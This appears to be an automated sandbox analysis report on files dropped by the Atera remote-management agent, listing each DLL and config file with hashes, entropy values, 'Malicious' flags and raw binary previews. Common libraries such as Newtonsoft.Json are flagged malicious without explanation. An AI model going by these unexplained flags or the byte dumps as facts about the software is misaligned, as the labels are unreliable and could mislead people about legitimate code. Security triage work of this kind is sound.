                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1537
                                                                                                                                                                                                                                        Entropy (8bit):5.0063120500114895
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdsIOvPF7NhOXrRH2/dVxlPH2/FVQ7uH2/FV0PH2/+w3VUrPH2/+789y:3sIk7O7RgdjdgFSagFsg+w3Sg+78w
                                                                                                                                                                                                                                        MD5:C3CA0AD8FE91D02044029A11A9480B1F
                                                                                                                                                                                                                                        SHA1:1FB4C1063460C48AC77D3D4702697A35727A5E51
                                                                                                                                                                                                                                        SHA-256:B2AED8BAB56D0FDBD1D6F1277A3257DFFBFD107BEB19320C0D1F4DC0E4AD3AEF
                                                                                                                                                                                                                                        SHA-512:50B18B6DD91CB691C8B77AB612A7172CE59881705A52F59880A29A0F81E910A61D3D4506AB53B1F945611AFE079B96A896F3F01442D3B68801B2748C68AE01F6
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAss

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.ini

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):12
                                                                                                                                                                                                                                        Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WhWB:Wo
                                                                                                                                                                                                                                        MD5:6473ED6D0D25B902FD8B7CEE34B2D260
                                                                                                                                                                                                                                        SHA1:5D0890CB19224079F6581D88C15B24E554364771
                                                                                                                                                                                                                                        SHA-256:1BEAAB7D9B210D794011D33238AA883B2A9A60FCD58A7FD6C29203289363392B
                                                                                                                                                                                                                                        SHA-512:543699EEB71F06DF84B401FC98AFB8CA6EE3A9E9D5F9B6FCCE54277CABA6CDCE100CCCFD2E310A30F274E73F2BBA161C5886D5599DEFA99CCC324540F074B265
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:version=30.2

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):112168
                                                                                                                                                                                                                                        Entropy (8bit):6.179971319993443
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:HgssVbDRgWchiMWXRIe0ZMTR8U3XTknAxb2waOn3ybQgLbYpm8GRUdokEWUpj769:HUpviy8UHTRxrybQgLbGm8FUpjO
                                                                                                                                                                                                                                        MD5:FD50AE7287B550575E360113077053E4
                                                                                                                                                                                                                                        SHA1:AB7C072756C7C9E6164580BA9E1E9D1E025850B5
                                                                                                                                                                                                                                        SHA-256:F3C49E6BFC2CEEDD5C3F8D5C07BB5D98E6D2DEB494B066B0878BB3B34136A140
                                                                                                                                                                                                                                        SHA-512:B833CFF36ABFFA34E0BBE8F87F63C24FE3F4F95A2D2C5C7C694F39D21B3E6761D57F68B052FB6423EA78D348214BA5F06D7BCF56F4C10355F3B088BE71D0C6DB
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... g.........." ..0................. ........... ....................................`.....................................O.......8...............((..........L................................................ ............... ..H............text....... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B........................H.......0...."...........................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p( ...r...p(!.........("...(#.....&..*........00......:.(......}....*..0..Z............($...,......(%...*~..........(&........($...-..(....s'...........,..((.........(%...*..........&E.......0..G........{....,.(......5~)...r'..po*...rm..pr...po+...ta...r...p(,..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\CommunityToolkit.WinUI.Notifications.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):145448
                                                                                                                                                                                                                                        Entropy (8bit):6.2029293745881775
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:hRdbKQx0YYK8gwbUEA5xZs0vVV2yzlhXhYThkyFqhtuElLVwkVJe5K+Q7P6IlIhA:X9XeDmzV2yzlhKLFU1lLVp1+2flYFnQB
                                                                                                                                                                                                                                        MD5:1AE3ECAC33709823C5C63FC0EEB83C1C
                                                                                                                                                                                                                                        SHA1:68A940D985D93B5EC6BB0629278ED43100DB5C8B
                                                                                                                                                                                                                                        SHA-256:8D39FD0909B98939C03F8F364A8306B53E1AF02F6C122285EB2405E6D390F118
                                                                                                                                                                                                                                        SHA-512:9301F5C579D1B1EF6A0BDB7F29330CA8BA1C32613E9F34132D8E97D9A671FC427F98A21D3E272ACDA72D00BCBCD13F9095E7592C6F67527BE135D1B6C9AA2E15
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....nI..........." ..0.............v$... ...@....... ..............................R+....`.................................#$..O....@..|...............((...`......,#..T............................................ ............... ..H............text...|.... ...................... ..`.rsrc...|....@......................@..@.reloc.......`......................@..B................W$......H.............................."......................................V!.b.....s&........*..{....*"..}....*..0..Z........(....o'...-.r...ps(...zs......(....o)....+..o*.....o.....o0...o+....o....-....,..o......*........*.$N......J.s,...}.....(-...*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*6.|.....(D...*..{....*"..}....*..{....*"..}....*V.(....-.r...p*.(....*..(E...%.(....o"...%.(....o$...%.(....o ...%.o....*..(-...*..{....*"..}....*..{ ...*"..} ...*..{!...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\CredentialManagement.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):38952
                                                                                                                                                                                                                                        Entropy (8bit):6.310987006425106
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:hINsi1A6I1MLzHS0+iFJBn5gpKNEpYi60wgi:GNsii6v/HS0+OJd5gpKm76tgi
                                                                                                                                                                                                                                        MD5:8A538A202FB4CC0BD0C8F6DF1B00A7ED
                                                                                                                                                                                                                                        SHA1:A0A609D7C9B4360830902BAEFB6DED9A80C68CE9
                                                                                                                                                                                                                                        SHA-256:650CAC5CAD71CD59077578A6402A829FDF1DC6542DF7C5AEAB996B65FB676BE4
                                                                                                                                                                                                                                        SHA-512:D4D1873F51064A4D151C2950C058087F0F2FEF3496C38BD5206718B74490254652C09FB683A4A8096C51DB4700F029C74DA3AEA59EC1C924E28B181912CDF140
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H..T...........!.....f............... ........... ....................................@....................................O....................p..((........................................................... ............... ..H............text...$d... ...f.................. ..`.rsrc................h..............@..@.reloc...............n..............@..B........................H........2...O...........................................................0..+.......s.........~....%.(.....s............(.....*..........#........,..%{.....`}....*.%{.....f_}....*..0..>.......................(....}=......}>......( ...}@......(....}?....*R.{....,.r...ps....z*:..(.....(....*...0............(.......(.....*...................J.{....-..&..}....*6.(.....{....*:.(......}....*6.(.....{....*..(.....(....,.r]..ps....z.o ... ....1.r]..ps!...z..}....*6.(.....{....*..(...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\EO.WebBrowser.WinForm.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):29224
                                                                                                                                                                                                                                        Entropy (8bit):6.6707658881278595
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:hmYaXzmSJL6guJrdvc5tIZmQCaBj4QU3hOTVTDvAGvoOCcdcOFyF606Nyb8E9VFx:bSJh5tIYQzT5zyF60aEpYi60f
                                                                                                                                                                                                                                        MD5:0C45A5EDD0217F927DA829BCB69B6EBC
                                                                                                                                                                                                                                        SHA1:EAFC8785985724EDE5BE9A01BAD2216EAF78D3DE
                                                                                                                                                                                                                                        SHA-256:EEA3E8AD892CC4EA203ED7C19EA2B0DCBBD415DECCCB407A38ECD785C1A97FB2
                                                                                                                                                                                                                                        SHA-512:23D958CEA8246E57DBE5CDCD7D25BF4B18900004B9364A7492B6DB754B021E91813C32FCBA89D3529503100D51C81B30C236A2D1BCE770EEE2313CC4519551E5
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p;_f.........." ..0..B..........Na... ........... ...............................s....@..................................`..S....................J..((........................................................... ............... ..H............text...TA... ...B.................. ..`.rsrc................D..............@..@.reloc...............H..............@..B................0a......H....... 3...-.........../.......2.........................................}.....(......}.......(..... ....(..... ....(.....(....o....*"..(....*..(....*...(.....{....,..+..+.-..{.....o....o....*...0..?.........+..o....,..+..+.-..o....o....,..+..+.-..*.o......,..+..+.-..*..0..J.........(.....(....,..+..+.-2.{.....3#.{....,..+..+.-....s....}.....(.....(....*j....$...s..........(....&*z.{....,..+..+.-..(......(....*..{....*.0...........{.....;.....(....,..+..+.-...}....*.{....,.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\EO.WebBrowser.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):219176
                                                                                                                                                                                                                                        Entropy (8bit):6.062603743526206
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:zYq80gPJle2CpcKyudA1+PVtMG8e7sw9CcHvhl9l:zYqqbe2CSod5dtM8ww7Pz
                                                                                                                                                                                                                                        MD5:5B3A6237E3AF3C7AF02CE7F3F670D241
                                                                                                                                                                                                                                        SHA1:05E79F3693B9396B34EDEC73942A9C03951412E0
                                                                                                                                                                                                                                        SHA-256:0F7FBE7E66A78174FCD84748572C4F4A2D03BF4D14BEB2670ADCAA51661A2A8C
                                                                                                                                                                                                                                        SHA-512:1844D5FC440446875FF4ACE95D520CE2D7D0E19CE004968A19DAE4244C8CB8CEBAACD7627F406D6F54B3DC00B6DAC2E497126577C2CB496A184E58B8B6421E37
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j;_f.........." ..0..(...........F... ........... ..............................M.....@.................................dF..W....`...............0..((........................................................... ............... ..H............text....&... ...(.................. ..`.rsrc........`.......*..............@..@.reloc..............................@..B.................F......H........S.......................S.......................................r...p(................s.........*...0...........o.....=3A.o......o......,..+..+.-.....o......(F.....,..+..+.:B......oK...*.o.... 7...@........o.......o.....o.....o........(F.......,..+..+.:t.....{f...,..+..+.-......-\.o........([.......~....(....,..+..+.-5.o........oF........ob.......,..+..+.-.....}f.....&......o.......o....*.o.....\3%.o.......o.......t......(......o....*.o.....]33.o.........1&.o........

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\FormControlsLibrary.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):302120
                                                                                                                                                                                                                                        Entropy (8bit):7.17562583053395
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:iVub5mx115y505H0jIfJMSFk9X0jIfJMSFk9i3:s6wJMykwwJMyki3
                                                                                                                                                                                                                                        MD5:9D2ACE1AA982BC225B578121C5C2F666
                                                                                                                                                                                                                                        SHA1:44A5F15565CAFE89AAD5AEB5AA7439AD18B70461
                                                                                                                                                                                                                                        SHA-256:66D62CA3B40E51E98FE11738E467405AA9A0BBEB14671F2FF158A830E87C6D57
                                                                                                                                                                                                                                        SHA-512:7C31721AF889403180240A9C68C1DCEEA8EB94C9C3E903CD9258E31E784AD8C62D9DDD372E78F5FB9A581DE68AAC9DCAE5C6C466894670EA27A21DAB3758C602
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... .F..........." ..0..l............... ........... ...............................c....`.................................?...O....................t..((..............8............................................ ............... ..H............text....k... ...l.................. ..`.rsrc................n..............@..@.reloc...............r..............@..B................s.......H.......$W...u..........@...X...........................................V.(......}......}....*..,..{.(..........,..p .@..(................s....(....*.~.......~....(....~.......~....(....*..0..........~.....(.....{.....{...+..(......{.....{3.~.....3..{.....p3.s>...s....%.o ...%.o!...(6...*.{.....{3"r...p.{.....{.....r...p.("...(#...*...0..$.......s$....o%...(&...o'...((......&.....*.................0..6.......r...p.().....-.r...p..q...(*.....q.....(+......&...*.*..........//..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\FormControlsLibrary.dll.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):432
                                                                                                                                                                                                                                        Entropy (8bit):5.0141792226861375
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:MMHdGzNFF7ap+5v5OXrRf/2//FicYo4xT:JduPF7NhOXrRH2/d9y
                                                                                                                                                                                                                                        MD5:8F6EB9E75E6A6F0C0D58FB697C10CEDF
                                                                                                                                                                                                                                        SHA1:6944935DFDC33E0C6DB26869BF25EDA85A2622D8
                                                                                                                                                                                                                                        SHA-256:E2B8677434501735FB0233ED0CC2FFEE5BF6FB4387C51DBCB2585A70E42E4F08
                                                                                                                                                                                                                                        SHA-512:A946252B2E3705EAE751A2672D4ADE1499ECEB28C48B4BE6150C4201EE20A7B9A4450C75E06B07F5DAA3528041A566931D988FBD0C2EA90240D61008895BA44A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\ICSharpCode.SharpZipLib.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):215080
                                                                                                                                                                                                                                        Entropy (8bit):6.030450621120585
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:N1uYsjrFIzmuxpOI/1MvCdRbpSISC8j7so:8Izm6pOIgvr7R
                                                                                                                                                                                                                                        MD5:A60919C8F8E65F7518286F804E54DB5B
                                                                                                                                                                                                                                        SHA1:9FADD4B771F00E87FF3DDD6C2B3A6FD25A1DBBF1
                                                                                                                                                                                                                                        SHA-256:FEB7575C2D9205C20A4526F60BB69CD631088927B6E58DD59AD561C792122803
                                                                                                                                                                                                                                        SHA-512:93517F2B5475BFD58986620538EF059C1532C2D653BACF8B67FF9A58D2F193F2A4A2338A27E2A0FAA51FCC88CF648BFDACAB261BA4BCF51A73BC815C83266DC8
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....*............" ..0..............'... ...@....... ...............................x....`..................................'..O....@..t............ ..((...`.......&..T............................................ ............... ..H............text........ ...................... ..`.rsrc...t....@......................@..@.reloc.......`......................@..B.................'......H........... ...................$&........................................( ...*"..(!...*&...("...*&...(#...*2.r...p(....*"..(....*&...(....*&...(....*2.rE..p(....*"..(....*&...(....*&...(....*2.r...p(....*"..(....*&...(....*&...(....*J..r...p($...(....*v....(%.....(%.....(%...(....*....L...%...%.r...p.%...%.r...p.%....%.r+..p.%...(&...(....*..(....*&...(....*&...(....*.0..)........{.........('...t......|......(...+...3.*....0..)........{.........()...t......|......(...+...3.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Microsoft.ApplicationInsights.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):398888
                                                                                                                                                                                                                                        Entropy (8bit):6.13428794433901
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:+jS6t1sm5LldNolZIkImcTi077Keb0wi0Lcr4so8mysKTqRjMnM6/Zmvu:++e55LgIkTmyAAfTnMLvu
                                                                                                                                                                                                                                        MD5:2B53A3CD189BF49E88B602C15418EC29
                                                                                                                                                                                                                                        SHA1:FA3D80250D1F3BD34331FB6FBF7DBEEC7D50DEF7
                                                                                                                                                                                                                                        SHA-256:013A5EE19F0E3EC57CD77B7D6D85EB7C5F8CC9E631E6D04388EA83BF0F307DC8
                                                                                                                                                                                                                                        SHA-512:1221C8961F330B3F50A6DA56ACD54EDEC82E38843C3E2470DEB5F25A62E21927CEF688260221CA277C151B1C5266B841D7F1EB54EFD7C4C2036ECAD72624FDC7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ... ....... .......................`.......`....`.................................v...O.... ..................((...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........P...................$.........................................{)...*..{*...*V.(+.....}).....}*...*...0..;........u......,/(,....{)....{)...o-...,.(.....{*....{*...o/...*.*. S]G. )UU.Z(,....{)...o0...X )UU.Z(.....{*...o1...X*.0...........r...p......%..{)....................-.q.............-.&.+.......o2....%..{*....................-.q.............-.&.+.......o2....(3...*..{4...*..{5...*..{6...*..{7...*..(+.....}4.....}5.....}6......}7...*....0..k........u......,_(,

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710184
                                                                                                                                                                                                                                        Entropy (8bit):5.960710652636906
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:jBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUH:jBjk38WuBcAbwoA/BkjSHXP36RMG6
                                                                                                                                                                                                                                        MD5:2E417388C1A053781655B4F14909216F
                                                                                                                                                                                                                                        SHA1:7EEA1424B92A3CDA918D9364557CEC4954397663
                                                                                                                                                                                                                                        SHA-256:C887F1417108311D77C8CF6E2DB1D95337ADE1E1BF95E0813EF5A4B8FE92110E
                                                                                                                                                                                                                                        SHA-512:472B5ADCE66638E5FB5A77D686CC0E492BF61556F6B878CFA74FE83D817B8BD057550806B504EA29A2BE91D3C8795B089DFDC83ACA8660B59DAE0180721E1E67
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p$?..........." ..0.............B.... ........... ....................... ....../w....`....................................O.......................((.......... ...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................$.......H.......x...(9............................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\QRCoder.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):154664
                                                                                                                                                                                                                                        Entropy (8bit):5.990387112012148
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:Z4wM6OoRu7qywKsqxhDuPr5xJMnOfMAw3TkHjt0QQNOWIkHUsz72otHA3d:Z4wZywKn/U5xEwKIk0Wm
                                                                                                                                                                                                                                        MD5:B945BFFBD7FE6C1B5CD7572EB64FBE88
                                                                                                                                                                                                                                        SHA1:8FCC3551664ABB2D870DDFF456F43110BD0B8765
                                                                                                                                                                                                                                        SHA-256:55CD1DED0A3241E59E8F4DB1D97F3805C2AEA17AAB1AC070BCD7B3608201B751
                                                                                                                                                                                                                                        SHA-512:3F7B120800547C96F1C1355ECBC566984775637589D3FA26AAA7F526DF2F6ADFA670F5E17A11BA00C1E2E0ED6CFEC20BDEE7408EA9BFB1292DA84402D321C443
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...}.b..........." ..0..*..........6&... ...`....... ....................................@..................................%..O....`...............4..((...........%..T............................................ ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@..@.reloc...............2..............@..B.................&......H............D...................$........................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. R..0 )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q.........-.&.+.......o ....%..{.......%q.........-.&.+.......o ....(!...*..{....*"..}....*..(....*:.(......(....*"..(....*f.(....%-.&+.(b.....(....*..(....*"..(....*...0..%.........("...(#...($....#.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Buffers.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):22056
                                                                                                                                                                                                                                        Entropy (8bit):6.670013589446811
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:4rMdp9yXOfPfAxR5zwWvYW8aznNyb8E9VF6IYijSJIVxAw89:4rMcXP64LEpYi600
                                                                                                                                                                                                                                        MD5:941F9C846BA51963D7C3EA4013BBB798
                                                                                                                                                                                                                                        SHA1:BD5EC38B867EA815F89B9C097EE6CAEDED412398
                                                                                                                                                                                                                                        SHA-256:4201A3647C90EA19E6725F458C6236B5E3683D4BEC6FCBB785263DCC1E85D040
                                                                                                                                                                                                                                        SHA-512:3E2F8371ED5E19FE80D7FCCBBE17D109C684FBAC465C6BB1D3C111B31E18F29B8067A9B5BD9AE5EE2F8621DA8E6ADB397382DC4EB27D0CA37B6A1E479CDD81BD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..$..........BC... ...`....... ..............................y.....@..................................B..O....`..@...............((...........A............................................... ............... ..H............text...H#... ...$.................. ..`.rsrc...@....`.......&..............@..@.reloc...............,..............@..B................$C......H........'...............?..X...8A......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*.~....*2r...p.(....*B.....(.........*R.....(...+%-.&(!...*^.....("....(...+&~....*.s$...*"..s%...*..(&...*.*....0......................

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Data.SQLite.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):420392
                                                                                                                                                                                                                                        Entropy (8bit):6.10961231240474
                                                                                                                                                                                                                                        Encrypted:false
